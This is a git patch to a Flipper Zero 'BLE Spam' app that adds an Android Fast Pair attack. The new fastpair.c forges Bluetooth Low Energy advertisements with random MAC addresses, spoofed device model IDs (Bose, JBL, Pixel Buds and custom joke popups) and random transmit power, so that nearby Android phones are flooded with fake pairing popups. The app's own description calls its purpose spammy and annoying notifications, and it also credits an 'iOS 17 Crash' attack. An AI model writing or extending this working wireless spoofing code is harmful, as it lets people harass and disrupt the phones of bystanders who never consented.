From 74c3ab88d9409a8318cd276f3f6010d3edfcc740 Mon Sep 17 00:00:00 2001
From: Willy-JL <49810075+Willy-JL@users.noreply.github.com>
Date: Sun, 15 Oct 2023 18:53:31 +0100
Subject: [PATCH] BLE Spam add Android FastPair spam

Co-authored-by: Spooks <62370103+Spooks4576@users.noreply.github.com>
---
 .../external/ble_spam/application.fam         |   2 +-
 applications/external/ble_spam/ble_spam.c     |  18 ++++-
 .../external/ble_spam/icons/android.png       | Bin 0 -> 5160 bytes
 .../external/ble_spam/protocols/_registry.c   |   1 +
 .../external/ble_spam/protocols/_registry.h   |   2 +
 .../external/ble_spam/protocols/fastpair.c    |  72 ++++++++++++++++++
 .../external/ble_spam/protocols/fastpair.h    |  11 +++
 7 files changed, 103 insertions(+), 3 deletions(-)
 create mode 100644 applications/external/ble_spam/icons/android.png
 create mode 100644 applications/external/ble_spam/protocols/fastpair.c
 create mode 100644 applications/external/ble_spam/protocols/fastpair.h

diff --git a/applications/external/ble_spam/application.fam b/applications/external/ble_spam/application.fam
index 1f0c019f1..d66dbeb14 100644
--- a/applications/external/ble_spam/application.fam
+++ b/applications/external/ble_spam/application.fam
@@ -6,7 +6,7 @@ App(
     stack_size=4 * 1024,
     fap_icon="ble_spam_10px.png",
     fap_category="Bluetooth",
-    fap_author="@Willy-JL & @ECTO-1A",
+    fap_author="@Willy-JL @ECTO-1A @Spooks4576",
     fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam",
     fap_version="2.0",
     fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications",
diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c
index 9a440471d..82903121a 100644
--- a/applications/external/ble_spam/ble_spam.c
+++ b/applications/external/ble_spam/ble_spam.c
@@ -7,7 +7,8 @@
 // Hacked together by @Willy-JL
 // Custom adv API by @Willy-JL (idea by @xMasterX)
 // iOS 17 Crash by @ECTO-1A
-// Research on behaviors and parameters by @Willy-JL and @ECTO-1A
+// Android Pairs by @Spooks4576 and @ECTO-1A
+// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
 
 typedef struct {
@@ -84,6 +85,19 @@ static Attack attacks[] = {
                     },
             },
     },
+    {
+        .title = "Android Device Pair",
+        .text = "~15min cooldown, long range",
+        .payload =
+            {
+                .random_mac = true,
+                .protocol = &ble_spam_protocol_fastpair,
+                .msg =
+                    {
+                        .fastpair = {},
+                    },
+            },
+    },
 };
 
 #define ATTACK_COUNT ((signed)COUNT_OF(attacks))
@@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
             AlignTop,
             "App+Spam: \e#WillyJL\e# XFW\n"
             "Apple+Crash: \e#ECTO-1A\e#\n"
-            "\n"
+            "Android: \e#Spooks4576\e#\n"
             "                                   Version \e#2.0\e#",
             false);
         break;
diff --git a/applications/external/ble_spam/icons/android.png b/applications/external/ble_spam/icons/android.png
new file mode 100644
index 0000000000000000000000000000000000000000..efd5b28cbb8212ecec24933f6235c75c68c317b1
GIT binary patch
literal 5160
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
N#?{e%%fIpPzX9_<or(Ye

literal 0
HcmV?d00001

diff --git a/applications/external/ble_spam/protocols/_registry.c b/applications/external/ble_spam/protocols/_registry.c
index 2481cf1a4..9ede92816 100644
--- a/applications/external/ble_spam/protocols/_registry.c
+++ b/applications/external/ble_spam/protocols/_registry.c
@@ -2,6 +2,7 @@
 
 const BleSpamProtocol* ble_spam_protocols[] = {
     &ble_spam_protocol_continuity,
+    &ble_spam_protocol_fastpair,
 };
 
 const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols);
diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h
index b2e05db88..f4c41c4f4 100644
--- a/applications/external/ble_spam/protocols/_registry.h
+++ b/applications/external/ble_spam/protocols/_registry.h
@@ -1,9 +1,11 @@
 #pragma once
 
 #include "continuity.h"
+#include "fastpair.h"
 
 union BleSpamMsg {
     ContinuityMsg continuity;
+    FastpairMsg fastpair;
 };
 
 extern const BleSpamProtocol* ble_spam_protocols[];
diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c
new file mode 100644
index 000000000..5cd91dd66
--- /dev/null
+++ b/applications/external/ble_spam/protocols/fastpair.c
@@ -0,0 +1,72 @@
+#include "fastpair.h"
+#include "_registry.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+const char* fastpair_get_name(const BleSpamMsg* _msg) {
+    const FastpairMsg* msg = &_msg->fastpair;
+    UNUSED(msg);
+    return "FastPair";
+}
+
+void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
+    const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
+
+    uint32_t model_id;
+    if(msg && msg->model_id != 0x000000) {
+        model_id = msg->model_id;
+    } else {
+        const uint32_t models[] = {
+            // Genuine devices
+            0xCD8256, // Bose NC 700
+            0xF52494, // JBL Buds Pro
+            0x718FA4, // JBL Live 300TWS
+            0x821F66, // JBL Flip 6
+            0x92BBBD, // Pixel Buds
+
+            // Custom debug popups
+            0xAA1FE1, // ClownMaster
+            0xAA187F, // VBucks
+            0xF38C02, // Boykisser
+            0x1448C9, // BLM
+            0xD5AB33, // Xtreme
+            0x13B39D, // Talking Sasquach
+        };
+        model_id = models[rand() % COUNT_OF(models)];
+    }
+
+    uint8_t size = 17;
+    uint8_t* packet = malloc(size);
+    uint8_t i = 0;
+
+    packet[i++] = 2; // Size
+    packet[i++] = 0x01; // AD Type (Flags)
+    packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED
+
+    packet[i++] = 3; // Size
+    packet[i++] = 0x03; // AD Type (Service UUID List)
+    packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+    packet[i++] = 0xFE; // ...
+
+    packet[i++] = 6; // Size
+    packet[i++] = 0x16; // AD Type (Service Data)
+    packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+    packet[i++] = 0xFE; // ...
+    packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID
+    packet[i++] = (model_id >> 0x08) & 0xFF; // ...
+    packet[i++] = (model_id >> 0x00) & 0xFF; // ...
+
+    packet[i++] = 2; // Size
+    packet[i++] = 0x0A; // AD Type (Tx Power Level)
+    packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
+
+    *out_size = size;
+    *out_packet = packet;
+}
+
+const BleSpamProtocol ble_spam_protocol_fastpair = {
+    .icon = &I_android,
+    .get_name = fastpair_get_name,
+    .make_packet = fastpair_make_packet,
+};
diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h
new file mode 100644
index 000000000..6555d0b6b
--- /dev/null
+++ b/applications/external/ble_spam/protocols/fastpair.h
@@ -0,0 +1,11 @@
+#pragma once
+#include "_base.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+typedef struct {
+    uint32_t model_id;
+} FastpairMsg;
+
+extern const BleSpamProtocol ble_spam_protocol_fastpair;